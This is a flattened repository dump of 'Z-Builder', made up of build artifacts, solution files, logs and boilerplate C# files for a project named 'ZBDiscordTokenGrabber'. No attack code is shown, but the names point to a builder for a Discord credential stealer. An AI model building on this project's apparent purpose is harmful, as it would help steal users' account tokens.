https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/lib/net461/System.Security.Principal.Windows.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/lib/netstandard1.3/System.Security.Principal.Windows.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/lib/netstandard1.3/System.Security.Principal.Windows.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/lib/netstandard2.0/System.Security.Principal.Windows.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/lib/netstandard2.0/System.Security.Principal.Windows.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/lib/uap10.0.16299/_._: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/lib/uap10.0.16299/_._ -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/ref/net46/System.Security.Principal.Windows.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/ref/net46/System.Security.Principal.Windows.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/ref/net461/System.Security.Principal.Windows.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/ref/net461/System.Security.Principal.Windows.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/ref/netcoreapp3.0/System.Security.Principal.Windows.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/ref/netcoreapp3.0/System.Security.Principal.Windows.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/ref/netstandard1.3/System.Security.Principal.Windows.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/ref/netstandard1.3/System.Security.Principal.Windows.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/ref/netstandard2.0/System.Security.Principal.Windows.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/ref/netstandard2.0/System.Security.Principal.Windows.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/ref/uap10.0.16299/_._: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/ref/uap10.0.16299/_._ -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/runtimes/unix/lib/netcoreapp2.0/System.Security.Principal.Windows.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/runtimes/unix/lib/netcoreapp2.0/System.Security.Principal.Windows.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/runtimes/unix/lib/netcoreapp2.1/System.Security.Principal.Windows.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/runtimes/unix/lib/netcoreapp2.1/System.Security.Principal.Windows.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/runtimes/win/lib/net46/System.Security.Principal.Windows.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/runtimes/win/lib/net46/System.Security.Principal.Windows.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/runtimes/win/lib/net461/System.Security.Principal.Windows.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/runtimes/win/lib/net461/System.Security.Principal.Windows.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/runtimes/win/lib/netcoreapp2.0/System.Security.Principal.Windows.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/runtimes/win/lib/netcoreapp2.0/System.Security.Principal.Windows.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/runtimes/win/lib/netcoreapp2.1/System.Security.Principal.Windows.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/runtimes/win/lib/netcoreapp2.1/System.Security.Principal.Windows.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/runtimes/win/lib/netstandard1.3/System.Security.Principal.Windows.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/runtimes/win/lib/netstandard1.3/System.Security.Principal.Windows.dll -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/runtimes/win/lib/uap10.0.16299/_._: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/runtimes/win/lib/uap10.0.16299/_._ -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/useSharedDesignerContext.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-Builder/packages/System.Security.Principal.Windows.4.7.0/useSharedDesignerContext.txt -------------------------------------------------------------------------------- /Z-Builder/packages/System.Security.Principal.Windows.4.7.0/version.txt: -------------------------------------------------------------------------------- 1 | 0f7f38c4fd323b26da10cce95f857f77f0f09b48 2 | -------------------------------------------------------------------------------- /Z-BuilderCL/Debug/Z-BuilderCL.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Debug/Z-BuilderCL.exe -------------------------------------------------------------------------------- /Z-BuilderCL/Debug/Z-BuilderCL.ilk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Debug/Z-BuilderCL.ilk -------------------------------------------------------------------------------- /Z-BuilderCL/Debug/Z-BuilderCL.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Debug/Z-BuilderCL.pdb -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30413.136 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Z-BuilderCL", "Z-BuilderCL\Z-BuilderCL.vcxproj", "{2BFE6D45-DE0F-44D8-8EA8-39AEAADEC493}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {2BFE6D45-DE0F-44D8-8EA8-39AEAADEC493}.Debug|x64.ActiveCfg = Debug|x64 17 | {2BFE6D45-DE0F-44D8-8EA8-39AEAADEC493}.Debug|x64.Build.0 = Debug|x64 18 | {2BFE6D45-DE0F-44D8-8EA8-39AEAADEC493}.Debug|x86.ActiveCfg = Debug|Win32 19 | {2BFE6D45-DE0F-44D8-8EA8-39AEAADEC493}.Debug|x86.Build.0 = Debug|Win32 20 | {2BFE6D45-DE0F-44D8-8EA8-39AEAADEC493}.Release|x64.ActiveCfg = Release|x64 21 | {2BFE6D45-DE0F-44D8-8EA8-39AEAADEC493}.Release|x64.Build.0 = Release|x64 22 | {2BFE6D45-DE0F-44D8-8EA8-39AEAADEC493}.Release|x86.ActiveCfg = Release|Win32 23 | {2BFE6D45-DE0F-44D8-8EA8-39AEAADEC493}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {913DA796-90B1-46D0-8F8C-10355CBEDDE9} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.Build.CppClean.log: -------------------------------------------------------------------------------- 1 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\debug\vc142.pdb 2 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\debug\vc142.idb 3 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\debug\z-buildercl.obj 4 | c:\users\zephy\source\repos\z-buildercl\debug\z-buildercl.exe 5 | c:\users\zephy\source\repos\z-buildercl\debug\z-buildercl.ilk 6 | c:\users\zephy\source\repos\z-buildercl\debug\z-buildercl.pdb 7 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\debug\vcpkg.applocal.log 8 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\debug\z-buildercl.tlog\cl.command.1.tlog 9 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\debug\z-buildercl.tlog\cl.read.1.tlog 10 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\debug\z-buildercl.tlog\cl.write.1.tlog 11 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\debug\z-buildercl.tlog\link.command.1.tlog 12 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\debug\z-buildercl.tlog\link.read.1.tlog 13 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\debug\z-buildercl.tlog\link.write.1.tlog 14 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\debug\z-buildercl.tlog\z-buildercl.write.1u.tlog 15 | -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.exe.recipe: -------------------------------------------------------------------------------- 1 |  2 | 3 | C:\Users\zephy\source\repos\Z-BuilderCL\Debug\Z-BuilderCL.exe 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.log: -------------------------------------------------------------------------------- 1 |  Z-BuilderCL.cpp 2 | C:\Users\zephy\source\repos\Z-BuilderCL\Z-BuilderCL\Z-BuilderCL.cpp(285,20): warning C4018: '<': signed/unsigned mismatch 3 | Z-BuilderCL.vcxproj -> C:\Users\zephy\source\repos\Z-BuilderCL\Debug\Z-BuilderCL.exe 4 | -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.obj -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.tlog/Z-BuilderCL.lastbuildstate: -------------------------------------------------------------------------------- 1 | PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.18362.0: 2 | Debug|Win32|C:\Users\zephy\source\repos\Z-BuilderCL\| 3 | -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.tlog/Z-BuilderCL.write.1u.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.tlog/Z-BuilderCL.write.1u.tlog -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.vcxproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Debug/Z-BuilderCL.vcxproj.FileListAbsolute.txt -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Debug/vc142.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Debug/vc142.idb -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Debug/vc142.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Debug/vc142.pdb -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Debug/vcpkg.applocal.log: -------------------------------------------------------------------------------- 1 |  2 | -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.Build.CppClean.log: -------------------------------------------------------------------------------- 1 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\release\vc142.pdb 2 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\release\z-buildercl.obj 3 | c:\users\zephy\source\repos\z-buildercl\release\z-buildercl.exe 4 | c:\users\zephy\source\repos\z-buildercl\release\z-buildercl.pdb 5 | c:\users\zephy\source\repos\z-buildercl\release\z-buildercl.ipdb 6 | c:\users\zephy\source\repos\z-buildercl\release\z-buildercl.iobj 7 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\release\vcpkg.applocal.log 8 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\release\z-buildercl.tlog\cl.command.1.tlog 9 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\release\z-buildercl.tlog\cl.read.1.tlog 10 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\release\z-buildercl.tlog\cl.write.1.tlog 11 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\release\z-buildercl.tlog\link.command.1.tlog 12 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\release\z-buildercl.tlog\link.read.1.tlog 13 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\release\z-buildercl.tlog\link.write.1.tlog 14 | c:\users\zephy\source\repos\z-buildercl\z-buildercl\release\z-buildercl.tlog\z-buildercl.write.1u.tlog 15 | -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.exe.recipe: -------------------------------------------------------------------------------- 1 |  2 | 3 | C:\Users\zephy\source\repos\Z-BuilderCL\Release\Z-BuilderCL.exe 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.log: -------------------------------------------------------------------------------- 1 |  Z-BuilderCL.cpp 2 | C:\Users\zephy\source\repos\Z-BuilderCL\Z-BuilderCL\Z-BuilderCL.cpp(288,20): warning C4018: '<': signed/unsigned mismatch 3 | Generating code 4 | Previous IPDB not found, fall back to full compilation. 5 | All 413 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. 6 | Finished generating code 7 | Z-BuilderCL.vcxproj -> C:\Users\zephy\source\repos\Z-BuilderCL\Release\Z-BuilderCL.exe 8 | -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.obj -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.tlog/Z-BuilderCL.lastbuildstate: -------------------------------------------------------------------------------- 1 | PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.18362.0: 2 | Release|Win32|C:\Users\zephy\source\repos\Z-BuilderCL\| 3 | -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.tlog/Z-BuilderCL.write.1u.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.tlog/Z-BuilderCL.write.1u.tlog -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.vcxproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Release/Z-BuilderCL.vcxproj.FileListAbsolute.txt -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Release/vc142.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/Z-BuilderCL/Z-BuilderCL/Release/vc142.pdb -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Release/vcpkg.applocal.log: -------------------------------------------------------------------------------- 1 |  2 | -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Z-BuilderCL.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | Header Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /Z-BuilderCL/Z-BuilderCL/Z-BuilderCL.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30413.136 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ZBDiscordTokenGrabber", "ZBDiscordTokenGrabber\ZBDiscordTokenGrabber.csproj", "{D19B9C53-5CC7-45A6-A6A7-11AB4D4EB9A4}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {D19B9C53-5CC7-45A6-A6A7-11AB4D4EB9A4}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {D19B9C53-5CC7-45A6-A6A7-11AB4D4EB9A4}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {D19B9C53-5CC7-45A6-A6A7-11AB4D4EB9A4}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {D19B9C53-5CC7-45A6-A6A7-11AB4D4EB9A4}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {65E56B13-5DC8-41DF-AAA8-212FA2FBF758} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("ZBDiscordTokenGrabber")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("ZBDiscordTokenGrabber")] 13 | [assembly: AssemblyCopyright("Copyright © 2020")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("d19b9c53-5cc7-45a6-a6a7-11ab4d4eb9a4")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/Properties/Settings.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace ZBDiscordTokenGrabber.Properties 12 | { 13 | 14 | 15 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 16 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")] 17 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase 18 | { 19 | 20 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); 21 | 22 | public static Settings Default 23 | { 24 | get 25 | { 26 | return defaultInstance; 27 | } 28 | } 29 | } 30 | } 31 | -------------------------------------------------------------------------------- 